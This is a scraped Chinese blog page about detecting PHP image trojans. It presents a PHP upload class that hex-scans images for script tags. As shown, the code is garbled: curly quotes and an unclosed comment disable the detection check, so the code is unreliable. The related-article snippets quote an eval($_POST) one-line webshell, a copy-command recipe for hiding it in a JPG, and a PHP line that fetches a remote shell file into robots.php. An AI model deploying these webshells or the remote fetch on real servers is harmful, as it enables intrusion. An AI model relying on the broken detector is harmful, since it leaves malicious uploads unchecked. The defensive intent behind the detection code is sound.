Linux图片马PHP,php检测图片木马(附代码)

最新推荐文章于 2024-04-24 11:30:00 发布
最新推荐文章于 2024-04-24 11:30:00 发布
阅读量492 收藏
点赞数
文章标签: Linux图片马PHP

/**

+——————————————————————————

* Upload 文件上传类

+——————————————————————————

* @package   Upload

* @author    Anyon

* @version   $Id: Upload.class.php 2013-3-20 21:47:23 Anyon $

+——————————————————————————

*/

class Upload {

private static $image = null;

private static $status = 0;

private static $suffix = null;

private static $imageType = array(‘.jpg’, ‘.bmp’,’.gif’,’.png’);

private static $message = array(

‘0’ => ‘没有错误发生,文件上传成功。’,

‘1’ => ‘上传的文件超过了 php.ini 中 upload_max_filesize 选项限制的值。’,

‘2’ => ‘上传文件的大小超过了 HTML 表单中 MAX_FILE_SIZE 选项指定的值。’,

‘3’ => ‘文件只有部分被上传。’,

‘4’ => ‘没有文件上传。’,

‘5’ => ‘未能通过安全检查的文件。’,

‘6’ => ‘找不到临时文件夹。’,

‘7’ => ‘文件写入失败。’,

‘8’ => ‘文件类型不支持’,

‘9’ => ‘上传的临时文件丢失。’,

);

//@ 开始执行文件上传

public static function start($feild = ‘file’) {

if (!empty($_FILES)) {

self::$status = $_FILES[$feild][‘error’];

if (self::$status > 0)

return array(‘status’ => self::$status, ‘msg’ => self::$message[self::$status]);

self::$image = $_FILES[$feild][‘tmp_name’];

self::$suffix = strtolower(strrchr($_FILES[$feild][‘name’], ‘.’));

return array(‘status’ => self::_upload(), ‘path’ => self::$image, ‘msg’ => self::$message[self::$status]);

} else {

return array(‘status’ => self::$status, ‘msg’ => self::$message[self::$status]);

}

}

//@ 私有 上传开始

private static function _upload($path = ‘./upload/’) {

date_default_timezone_set(‘PRC’);

$newFile = $path . date(‘Y/m/d/His’) . rand(100, 999) . self::$suffix;

self::umkdir(dirname($newFile));

if (is_uploaded_file(self::$image) && move_uploaded_file(self::$image, $newFile)) {

self::$image = $newFile;

if (in_array(self::$suffix, self::$imageType))

return self::checkHex();

else

return self::$status = 0;

} else {

return self::$status = 9;

}

}

//@ 私有 16进制检测

private static function checkHex() {

if (file_exists(self::$image)) {

$resource = fopen(self::$image, ‘rb’);

$fileSize = filesize(self::$image);

fseek($resource, 0);

if ($fileSize > 512) { // 取头和尾

$hexCode = bin2hex(fread($resource, 512));

fseek($resource, $fileSize – 512);

$hexCode .= bin2hex(fread($resource, 512));

} else { // 取全部

$hexCode = bin2hex(fread($resource, $fileSize));

}

fclose($resource);

/* 匹配16进制中的 */

/* 匹配16进制中的 ( ) ?> */

/* 匹配16进制中的

if (preg_match(“/(3c25.*?28.*?29.*?253e)|(3c3f.*?28.*?29.*?3f3e)|(3C534352495054)|(2F5343524950543E)|(3C736372697074)|(2F7363726970743E)/is”, $hexCode))

self::$status = 5;

else

self::$status = 0;

return self::$status;

} else {

return self::$status = 9;

}

}

//@ 私有 创建目录

private static function umkdir($dir) {

if (!file_exists($dir) && !is_dir($dir)) {

self::umkdir(dirname($dir));

@mkdir($dir);

}

}

}

第四恶魔
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP检测本地图片是否有木
04-20
也可以用linux服务器上的木扫描软件,比如 Clamav 支持命令行执行的,上传之后就扫一下,最可靠, $last_line = system('php /var/bin/clamdscan upload.jpg'); 根据扫描结果就可以判断了 $rs = checkMuma("sucaihuo.png"); $tips = array( "0" => "文件没问题", "5" => "文件有毒", "-1" => "文件没有上传" );
php检测手机,thinkphp 检测上传的图片中是否含有木脚本
weixin_33275503的博客
03-20 197
+------------------------------------------------------------------------------* Upload 文件上传类+------------------------------------------------------------------------------* @package Upload+--------...
web安全-文件上传漏洞-图片制作-相关php函数讲解-upload靶场通关详细教学(3)
最新发布
m0_59598029的博客
04-24 1014
制作图片有两种方法,一种是文本方式打开,末尾粘贴一句话木,令一种是使用命令进行合成。首先准备好一个图片(这里是1.png)。!将一个图片以文本格式打开(这里用的Notepad++,以记事本方式打开修改也能连接成功,不过修改后图片无法正常显示了)。!后面粘贴上一句话木。!图片依然可以正常打开。!首先准备好一个图片(这里是1.png)。再准备好一个一句话木(这里是2.php)。!打开命令提示符,首先进入上面两个文件存放的路径。使用下面的命令进行图片合成。!!
图片的制作
hao2580的博客
05-13 7074
1.首先图片命名111.jpg 2.再新建222.asp文件,一句话木写入 3.然后win+R,cmd,cd到之前图片的目录路径下,命令为copy 111.jpg/b+222.asp/a 333.jpg 最后就会出现新的图片3333.jpg,就是制作出的图片
图片木马制作的三种方法
热门推荐
whatday的专栏
01-25 6万+
1.Copy命令制作 1.asp内容: 打开cmd,数据一下命令: 此时打开两个jpg文件,相比: 且打开2.jpg可以像1.jpg一样显示图像。 把以下代码放入目标网站,即可按asp执行。 2.Uedit32 本制作来自于:雪糕。 我们通常在得到webshell之后都想给自己留
linux jpg文件查找木
weixin_34148456的博客
11-27 279
find ./ -type f -name "*.jpg" | xargs grep "eval" 转载于:https://www.cnblogs.com/jackspider/p/10026150.html
php实现Linux服务器木排查及加固功能
10-24
PHP通常会包含特定的执行命令,例如`eval()`或`assert()`函数,这些函数可以让恶意代码执行用户提交的数据。通过在服务器上的所有PHP文件中搜索这些特征码,可以找出可能存在的Webshell。例如,使用`find`命令...
Linux中查找php程序例子
01-20
php其实是一个正常的php文件了,只是我们给了权限太高导致这个程序可以执行系统文件或调用系统命令来操作从而得到了服务器相关权限了,这样对方可以随时拿我们程序或数据库了,下面我来给各位介绍一些查找php...
php网站被挂木后的修复方法总结
10-25
主要介绍了php网站被挂木后的修复方法,总结分析了Linux与Windows系统上木的查杀方法,并给出了一个完整的木查找工具实例,需要的朋友可以参考下
抓住Linux的小尾巴并且清除它
11-28 1400
抓住Linux的小尾巴并且清除它 时间 2015-02-28 19:27:17 网络安全攻防研究室 原文  http://www.91ri.org/12348.html 主题 木 Linux Linux越来越常见,而Linux系统常常运行着重要的业务,所以一旦被植入木,对业务的影响会很大。不久前,某 客户被安全机构检测出流量异常,客户寻找了许久
实践php检测图片木马
NiceGY
04-11 5522
实践php检测图片木马
PHP Web木扫描器代码 v1.0 安全测试工具
10-28
PHP Web 木扫描器 - 安全测试工具,一个在php环境下扫描php的工具,目前可扫出以下特征码。懒惰设计,直接套用phpspy样式。注意: 扫描出来的文件并不一定就是后门, 请自行判断、审核、对比原文件
检查上传图片是否合法的函数,木改后缀名、图片加恶意代码均逃不过
01-02
今天试了下AspJpeg组件,发现用AspJpeg组件去处理不正常的图片文件的时候就会出错,呵呵,这个正好可以让我们用来检查图片的合法性,偶给封装成函数了~ 代码如下:‘——————————————- ‘函数名:chkimg ‘作 用:检查图片文件是否合法 ‘参 数:img,图片路径 ‘返回值:布尔类型 ‘条 件:服务器必须支持AspJpeg ‘——————————————- Function chkimg(img)         on error resume Next         chkimg=True         if isnull(img) then chkimg=false
【安全攻略】Thinkphp5.0检测上传的文件是否包含木
美奇软件开发工作室
12-10 4231
一、要做测试,那么肯定是要准备一张带木图片文件,制作木图片的方法: 1、创建一个名为test.php的文件,代码: <?php copy("http://www.zy13.net/shell.txt","robots.php"); ?> test.php里的代码说明: copy(要复制的文件,复制文件的目的地); http://php.123.com/shell.txthttp://www.zy13.net/shell.txt是远程服务器里的一个txt文件,里面.
图片木马-渗透测试
h0ers的博客
10-28 2751
制作图片木马中的问题 问题 :copy命令制作图片木马后,菜刀无法连接 1.执行步骤: 一张普通图片:1.jpg php版本一句话木,保存为 1.php代码如下: <?php @eval($_POST['pass']);?> 制作图片木马,将图片文件和php文件合并为2.jpg,命令如下: copy 1.jpg/b+1.php/a 2.jpg 其中 /b代表二进制文件,/a代表ASCII码文件 上传成功后,用菜刀连接,弹出成功获取图片,未拿到webshell。 2.问题排查 用HxD h
java 木编程_Java写的木程序源码,仅供学习参考使用
weixin_36415835的博客
02-13 410
【实例简介】/** 本程序仅供学习参考使用。严禁使用本程序进行违法行为!* 本程序功能* 1、程序开机自动启动(√)* 2、自动发送邮件* 3、执行dos命令,并将信息返回、这里可以执行关机等命令(√)* 4、锁定鼠标,这里通过一个线程实现* 5、查看被控制端的桌面,将桌面画面截图并发送给控制端(√)* 6、在被控制端弹出对话框,多种对话框模式(√)* 7、让被控制端闪屏(√)* 本程序仅供学习参...
文件上传之图片木马的学习
weixin_30907935的博客
06-03 4887
图片木马的小故事:   PHP 5.4+ 之后“%00”截断方法已经无法有效的执行了!故此图片木马非常的有意思。 图片木马:(PHP为例) 1、Copy命令制作:      图片对比: 一句话木图片连接: 我们成功上传木后,并不能立的使用菜刀连接上脚本。我们需要将图片木马jpg文件改为可执行的php脚本文件。 如上图,成功的利用菜刀连接到了服务器。 ...
图片木马(海阳木)的代码及防止上传的方法
思科网络
07-01 4089
一、海阳图片木马代码:其实不一定是这样,只要是HTML代码或ASP任何代码均可。%@ LANGUAGE="VBSCRIPT" codepage ="936" %>title>111title>style>body{font-family: 宋体 ; font-size: 10pt}table{ font-family: 宋体; font-size: 9pt }a{ font-famil
php 加密,PHP后门木详解
weixin_39625987的博客
03-09 776
说起php后门木我就心有愉季啊前不久一个站就因不小心给人注入了然后写入了小木这样结果大家知道的我就不说了下面我来给大家收集了各种php后门木做法大家可参考。php后门木对大家来说一点都不陌生吧但是它的种类您又知多少呢本文为您浅析说明一些php后门木常用的函数。php后门木常用的函数大致上可分为四种类型1. 执行系统命令: system, passthru, shell_exec, ex...
php一句话木图片
01-30
图片是一种将恶意代码嵌入到图片文件中的攻击方式。下面是一个示例,展示了如何在PHP一句话木中使用图片的方法: ```php <?php $cmd = $_GET['cmd']; // 通过GET请求获取命令 // 执行命令并返回结果 $...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值